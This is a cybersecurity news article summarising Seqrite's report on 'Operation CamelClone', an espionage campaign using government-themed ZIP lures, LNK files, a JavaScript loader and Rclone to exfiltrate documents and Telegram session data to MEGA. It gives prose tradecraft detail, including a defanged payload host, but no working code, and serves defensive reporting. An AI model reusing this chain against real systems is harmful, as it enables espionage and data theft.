By rssfeeds-admin .webp?ssl=1 "CamelClone Spy Campaign Abuses Public File-Sharing Sites and Rclone in Government-Focused Attacks")
The operation relies on spear-phishing emails carrying malicious ZIP archives disguised as official government correspondence, tricking recipients into triggering a multi-stage infection chain that ultimately leads to data theft using a legitimate cloud transfer tool.
The campaign first surfaced in late February 2026, when a suspicious ZIP file named after Algeria’s Ministry of Housing, Urban Development, and the City was spotted on VirusTotal, uploaded from Algeria on February 24.
Shortly after, a second sample emerged, targeting Mongolia with a lure themed around “Expanding cooperation with China.”
As March progressed, two more samples surfaced — one referencing Algerian-Ukrainian cooperation proposals and another targeting Kuwait’s Air Force with a defense procurement decoy — confirming the campaign’s wide geographic reach.
Seqrite analysts identified the full scope of Operation CamelClone and noted that while the target countries may seem unconnected, each sits at a critical point in the current global geopolitical landscape.
Ukraine remains at the center of an active armed conflict, Algeria plays a key role in European and African energy politics, Mongolia is navigating tensions between China, Russia, and Western partners, and Kuwait is a strategic Gulf defense partner.
The attackers appear to have carefully selected their targets based on intelligence value rather than financial motivation.
The campaign’s attack vector is consistent across all observed samples. Each ZIP archive contains a Windows shortcut (LNK) file alongside a convincing decoy image bearing an official government logo — the Algerian Ministry’s seal, Mongolia’s MonAtom LLC emblem, or the Kuwait Armed Forces crest.
Once the victim opens the shortcut, a hidden PowerShell command executes silently in the background, pulling the next stage of the attack from an anonymous public file-sharing platform.
What makes this operation particularly difficult to detect is the complete absence of dedicated command-and-control servers.
Instead, the attackers host all their malicious payloads on filebulldogs[.]com, a public file-sharing site, and route stolen data through MEGA cloud storage.
This approach effectively blends malicious traffic with ordinary internet activity, making detection through standard network monitoring significantly harder.
Inside the Infection Chain
Once the shortcut file runs, a PowerShell command downloads a JavaScript file named f.js from filebulldogs[.]com and executes it immediately.
This loader, which Seqrite researchers track under the name HOPPINGANT, is a Windows Script Host JavaScript that runs two Base64-encoded PowerShell commands to carry out further malicious activity.
These commands first download a null-padded decoy PDF to distract the victim, then pull a ZIP archive named a.zip containing a portable copy of Rclone — a legitimate open-source cloud file transfer tool — version v1.70.3.
After extracting and running Rclone, the script decodes a stored password using a simple XOR method with the key value 56, then uses it to log into a MEGA account registered under an anonymous onionmail.org email address.
With the connection established, the tool sweeps the victim’s Desktop for .doc, .docx, .pdf, and .txt files and uploads them directly to the attacker’s storage.
The script also targets Telegram session data from the Telegram Desktop tdata directory, potentially giving the attacker access to private conversations. Four unique MEGA accounts were identified across all campaigns, all registered in February and March 2026.
Organizations in government, defense, and diplomatic sectors should treat unsolicited ZIP files with great caution, especially those referencing official institutions or defense partnerships.
Blocking access to anonymous file-sharing platforms and monitoring outbound traffic to cloud storage services like MEGA can limit exposure.
Restricting LNK file execution from untrusted sources and deploying behavior-based endpoint detection tools can help stop the PowerShell and JavaScript-based execution chain before it completes.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post CamelClone Spy Campaign Abuses Public File-Sharing Sites and Rclone in Government-Focused Attacks appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.